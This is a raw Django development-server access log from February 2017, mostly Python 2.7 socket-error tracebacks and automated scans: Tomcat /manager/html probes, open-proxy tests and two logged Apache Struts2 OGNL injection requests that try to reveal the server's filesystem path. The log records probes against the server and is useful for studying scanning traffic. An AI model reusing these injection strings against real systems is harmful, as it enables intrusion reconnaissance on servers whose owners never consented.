    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[09/Feb/2017 21:26:17] "GET /robots.txt HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[09/Feb/2017 21:26:23] "GET / HTTP/1.1" 404 2010
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[09/Feb/2017 21:26:23] "GET / HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[09/Feb/2017 22:12:35] "GET / HTTP/1.1" 404 2005
[09/Feb/2017 22:15:22] "GET /manager/html HTTP/1.1" 404 2041
[10/Feb/2017 02:38:58] "GET /manager/html HTTP/1.1" 404 2041
[10/Feb/2017 05:18:43] "GET / HTTP/1.1" 404 2000
[10/Feb/2017 05:45:28] "GET /manager/html HTTP/1.1" 404 2041
[10/Feb/2017 06:06:05] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[10/Feb/2017 06:06:05] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[10/Feb/2017 08:23:43] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[10/Feb/2017 09:14:02] "GET /robots.txt HTTP/1.1" 404 2036
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[10/Feb/2017 09:14:02] "GET /robots.txt HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[10/Feb/2017 09:14:04] "GET / HTTP/1.1" 404 2006
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[10/Feb/2017 09:14:04] "GET / HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[10/Feb/2017 09:40:06] "GET /manager/html HTTP/1.1" 404 2041
[10/Feb/2017 11:36:22] "GET / HTTP/1.1" 404 2005
[10/Feb/2017 11:47:07] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[10/Feb/2017 11:58:13] "GET /manager/html HTTP/1.1" 404 2041
[10/Feb/2017 12:14:25] "GET http://www.baidu.com/?rands=_12125174244632604535076 HTTP/1.0" 404 1683
[10/Feb/2017 12:14:26] "GET http://23.251.55.38/index.html?rands=_5495110172024442203586040 HTTP/1.0" 404 1711
[10/Feb/2017 13:10:22] "GET /manager/html HTTP/1.1" 404 2041
[10/Feb/2017 15:56:13] "GET /index.php HTTP/1.1" 404 2032
[10/Feb/2017 18:58:23] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[10/Feb/2017 19:20:17] "GET /manager/html HTTP/1.1" 404 2041
[10/Feb/2017 20:58:28] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[10/Feb/2017 21:10:28] "GET http://www.baidu.com/?rands=_1180411357643052269635008 HTTP/1.0" 404 1685
[10/Feb/2017 21:10:30] "GET http://23.251.55.38/index.html?rands=_25109066101534501432820 HTTP/1.0" 404 1709
[10/Feb/2017 21:43:21] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[10/Feb/2017 21:44:33] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[10/Feb/2017 22:39:16] "GET /manager/html HTTP/1.1" 404 2041
[11/Feb/2017 02:10:42] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[11/Feb/2017 02:16:01] "GET /script HTTP/1.1" 404 2023
[11/Feb/2017 02:33:26] "GET / HTTP/1.1" 404 2005
[11/Feb/2017 02:59:34] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[11/Feb/2017 03:38:50] "GET /manager/html HTTP/1.1" 404 2041
[11/Feb/2017 03:41:18] "GET /script HTTP/1.1" 404 2023
[11/Feb/2017 06:28:39] "GET / HTTP/1.1" 404 2005
[11/Feb/2017 09:10:03] "GET / HTTP/1.1" 404 2003
[11/Feb/2017 11:09:31] "GET /script HTTP/1.1" 404 2023
[11/Feb/2017 11:46:13] "GET /manager/html HTTP/1.1" 404 2041
[11/Feb/2017 12:13:50] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[11/Feb/2017 14:58:56] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[11/Feb/2017 15:37:47] "GET http://www.baidu.com/?rands=_18546146260814316124375104 HTTP/1.0" 404 1686
[11/Feb/2017 15:37:51] "GET http://23.251.55.38/index.html?rands=_271652411233768003835260 HTTP/1.0" 404 1710
[11/Feb/2017 18:34:53] "GET /manager/html HTTP/1.1" 404 2041
[11/Feb/2017 22:17:07] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[11/Feb/2017 23:20:26] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[11/Feb/2017 23:45:32] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[12/Feb/2017 01:07:39] "GET http://www.baidu.com/?rands=_44351021500177550847040 HTTP/1.0" 404 1683
[12/Feb/2017 01:07:39] "GET http://23.251.55.38/index.html?rands=_148269547202754990969584 HTTP/1.0" 404 1710
[12/Feb/2017 01:29:16] "GET / HTTP/1.1" 404 2003
[12/Feb/2017 02:02:03] "GET / HTTP/1.1" 404 2000
[12/Feb/2017 04:42:56] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[12/Feb/2017 04:52:17] "GET /manager/html HTTP/1.1" 404 2041
[12/Feb/2017 07:39:35] "GET / HTTP/1.1" 404 2000
[12/Feb/2017 09:29:40] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[12/Feb/2017 10:03:34] "GET http://www.baidu.com/?rands=_9905610006113160120048 HTTP/1.0" 404 1682
[12/Feb/2017 10:03:35] "GET http://23.251.55.38/index.html?rands=_3857134685610381802748996 HTTP/1.0" 404 1711
[12/Feb/2017 10:53:06] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[12/Feb/2017 11:36:05] "GET /blog/home/ HTTP/1.1" 200 5202
[12/Feb/2017 11:51:42] "GET / HTTP/1.1" 404 2006
[12/Feb/2017 12:00:37] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[12/Feb/2017 12:16:20] "GET http://www.126.com/ HTTP/1.1" 404 1644
[12/Feb/2017 13:29:27] "GET /robots.txt HTTP/1.1" 404 2036
[12/Feb/2017 13:29:31] "GET / HTTP/1.1" 404 2006
[12/Feb/2017 14:36:08] "GET / HTTP/1.1" 404 2005
[12/Feb/2017 17:48:36] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[12/Feb/2017 19:06:30] "GET http://www.baidu.com/?rands=_24128108652453118728549388 HTTP/1.0" 404 1686
[12/Feb/2017 19:06:30] "GET http://23.251.55.38/index.html?rands=_16907182266045073081198592 HTTP/1.0" 404 1712
[12/Feb/2017 22:03:17] "GET / HTTP/1.1" 404 2002
[12/Feb/2017 22:38:44] "GET /admin/index.action?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()} HTTP/1.1" 404 4370
[12/Feb/2017 22:38:44] "GET /loginAction.action?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()} HTTP/1.1" 404 2617
[12/Feb/2017 23:42:56] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[13/Feb/2017 00:31:48] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
